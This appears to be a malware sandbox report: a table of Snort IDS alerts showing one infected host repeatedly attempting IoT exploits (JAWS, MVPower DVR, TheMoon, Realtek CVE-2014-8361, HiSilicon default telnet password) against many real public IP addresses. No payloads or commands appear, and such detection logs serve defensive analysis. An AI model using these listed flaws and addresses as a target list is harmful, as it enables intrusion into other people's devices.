| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47636 -> 23.82.92.137:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52742 -> 156.244.43.73:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33090 -> 129.205.25.66:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55440 -> 38.133.108.77:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59272 -> 23.203.109.124:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51948 -> 108.187.140.165:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44474 -> 54.180.9.78:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.203.109.124:80 -> 192.168.2.23:59272 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49996 -> 104.124.43.50:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51948 -> 108.187.140.165:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40618 -> 23.10.10.76:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44474 -> 54.180.9.78:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36084 -> 153.92.5.160:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.124.43.50:80 -> 192.168.2.23:49996 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.10.10.76:80 -> 192.168.2.23:40618 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40618 -> 23.10.10.76:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54088 -> 212.55.223.131:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48058 -> 18.194.17.67:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48058 -> 18.194.17.67:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36084 -> 153.92.5.160:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53980 -> 52.206.63.12:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53708 -> 70.184.217.43:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53980 -> 52.206.63.12:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:49246 -> 98.181.246.249:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45864 -> 61.19.151.222:80 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59278 -> 153.132.118.166:52869 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:45774 -> 98.21.99.150:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56106 -> 172.104.33.106:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33286 -> 105.226.88.64:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33286 -> 105.226.88.64:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.52.186:80 -> 192.168.2.23:42812 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58664 -> 104.16.0.2:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45068 -> 104.23.134.158:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58664 -> 104.16.0.2:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45068 -> 104.23.134.158:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59716 -> 77.68.81.124:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36314 -> 178.62.77.151:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60898 -> 205.201.13.133:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56940 -> 104.115.95.190:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.115.95.190:80 -> 192.168.2.23:56940 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50728 -> 172.67.147.231:8080 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.100.236:80 -> 192.168.2.23:36390 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.27.62:80 -> 192.168.2.23:36250 |
| Source: Traffic | Snort IDS: 210 BACKDOOR attempt 192.168.2.23:33112 -> 72.52.81.229:23 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48584 -> 172.67.250.200:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:40866 -> 172.65.203.117:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52284 -> 172.67.79.119:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44268 -> 172.65.81.74:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:53722 -> 98.118.119.243:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41504 -> 206.132.166.152:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42042 -> 98.43.115.24:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48254 -> 98.143.221.43:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:41236 -> 184.166.156.222:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54088 -> 23.72.29.150:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49166 -> 176.31.76.72:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.72.29.150:80 -> 192.168.2.23:54088 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49166 -> 176.31.76.72:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43382 -> 34.201.235.212:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57090 -> 103.134.102.166:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39632 -> 152.195.133.102:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39632 -> 152.195.133.102:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34774 -> 185.126.156.219:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60382 -> 78.189.94.166:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56678 -> 192.144.25.186:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56678 -> 192.144.25.186:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 192.144.25.186:80 -> 192.168.2.23:56678 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33088 -> 191.61.166.57:52869 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.252.195:80 -> 192.168.2.23:40576 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.198.103:80 -> 192.168.2.23:55458 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.217.155:80 -> 192.168.2.23:55506 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34502 -> 156.235.6.142:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42352 -> 172.65.235.185:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:60876 -> 172.67.62.13:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58366 -> 82.165.138.216:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47852 -> 54.192.0.194:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47854 -> 54.192.0.194:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47640 -> 52.202.92.178:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56236 -> 104.108.175.155:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38798 -> 104.253.87.213:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39434 -> 104.86.1.197:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.108.175.155:80 -> 192.168.2.23:56236 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56698 -> 68.183.218.151:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53296 -> 14.36.102.231:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59448 -> 152.92.83.63:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47640 -> 52.202.92.178:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42096 -> 124.219.64.175:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.86.1.197:80 -> 192.168.2.23:39434 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54412 -> 137.220.142.35:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:46820 -> 172.65.116.145:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50962 -> 172.110.58.41:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:39390 -> 98.212.237.255:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48216 -> 172.67.201.68:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56038 -> 172.67.101.52:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48084 -> 172.65.223.34:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56728 -> 172.64.137.153:8080 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.186.158:80 -> 192.168.2.23:57794 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.84.25:80 -> 192.168.2.23:38816 |
| Source: Traffic | Snort IDS: 1251 INFO TELNET Bad Login 59.4.192.2:23 -> 192.168.2.23:40762 |
| Source: Traffic | Snort IDS: 718 INFO TELNET login incorrect 59.4.192.2:23 -> 192.168.2.23:40762 |
| Source: Traffic | Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:35504 -> 222.148.237.245:23 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45358 -> 67.220.82.233:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49432 -> 206.237.180.115:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41522 -> 23.72.236.241:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50084 -> 78.47.205.61:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32818 -> 185.11.201.238:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46226 -> 188.68.228.115:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50084 -> 78.47.205.61:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49432 -> 206.237.180.115:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38048 -> 184.29.93.53:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47480 -> 103.76.46.245:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.72.236.241:80 -> 192.168.2.23:41522 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51978 -> 44.241.246.23:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.29.93.53:80 -> 192.168.2.23:38048 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.79.175:80 -> 192.168.2.23:43610 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.197.23:80 -> 192.168.2.23:41944 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47044 -> 180.222.102.200:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51978 -> 44.241.246.23:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.43.247:80 -> 192.168.2.23:47292 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47044 -> 180.222.102.200:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41910 -> 177.186.82.108:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38430 -> 45.91.22.245:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45358 -> 67.220.82.233:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51370 -> 104.24.177.167:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47178 -> 209.182.204.84:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51370 -> 104.24.177.167:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45362 -> 95.142.205.126:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47178 -> 209.182.204.84:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47480 -> 185.112.7.173:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38106 -> 184.29.93.53:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47362 -> 98.158.219.21:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.29.93.53:80 -> 192.168.2.23:38106 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38106 -> 184.29.93.53:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39554 -> 54.70.218.160:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58122 -> 41.223.173.9:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44520 -> 184.168.53.173:8080 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47362 -> 98.158.219.21:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50100 -> 156.224.199.5:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42474 -> 184.168.37.74:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:60592 -> 184.168.185.123:8080 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58122 -> 41.223.173.9:80 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37368 -> 210.16.99.110:52869 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35880 -> 172.65.90.133:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:36816 -> 172.65.248.91:8080 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.75.217:80 -> 192.168.2.23:48152 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.174.121:80 -> 192.168.2.23:42236 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35322 -> 172.65.108.107:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35316 -> 98.233.145.78:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52600 -> 198.211.107.153:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45594 -> 77.20.90.56:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32952 -> 31.131.29.65:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33424 -> 89.108.75.138:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45594 -> 77.20.90.56:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32952 -> 31.131.29.65:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46696 -> 180.235.241.59:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53266 -> 94.74.76.199:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54196 -> 212.48.94.43:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58282 -> 109.168.82.130:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45398 -> 141.0.207.110:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37454 -> 212.128.130.25:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58282 -> 109.168.82.130:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37582 -> 143.48.220.96:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40326 -> 104.115.211.231:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44216 -> 172.64.173.70:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:33244 -> 172.67.229.216:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:49610 -> 172.65.163.63:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37842 -> 69.144.53.140:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56282 -> 98.16.54.148:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:32918 -> 98.172.55.228:8080 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.115.211.231:80 -> 192.168.2.23:40326 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47510 -> 181.41.236.178:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56566 -> 98.197.109.46:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:46384 -> 172.67.120.170:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42220 -> 172.65.142.185:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:39588 -> 172.65.143.187:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:47928 -> 98.34.226.110:8080 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56880 -> 190.135.164.179:52869 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44098 -> 98.13.204.195:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55170 -> 172.73.129.59:8080 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.237.60:80 -> 192.168.2.23:60534 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.113.249:80 -> 192.168.2.23:58032 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.27.176:80 -> 192.168.2.23:35490 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:58076 -> 172.105.173.96:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42350 -> 46.14.93.114:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58142 -> 143.204.4.42:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58144 -> 143.204.4.42:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50856 -> 172.67.159.13:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50856 -> 172.67.159.13:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41810 -> 2.244.133.184:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41810 -> 2.244.133.184:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56876 -> 54.154.59.98:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57664 -> 104.117.59.144:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50498 -> 124.218.93.23:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.117.59.144:80 -> 192.168.2.23:57664 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57664 -> 104.117.59.144:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47024 -> 102.129.197.149:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57350 -> 218.247.93.174:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 102.129.197.149:80 -> 192.168.2.23:47024 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50498 -> 124.218.93.23:80 |
| Source: Traffic | Snort IDS: 716 INFO TELNET access 93.89.105.201:23 -> 192.168.2.23:55202 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55502 -> 172.67.225.164:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48702 -> 172.67.10.146:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48944 -> 172.65.186.138:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:41828 -> 172.67.142.130:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59190 -> 192.126.211.202:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43640 -> 172.65.147.203:8080 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 192.126.211.202:80 -> 192.168.2.23:59190 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59190 -> 192.126.211.202:80 |
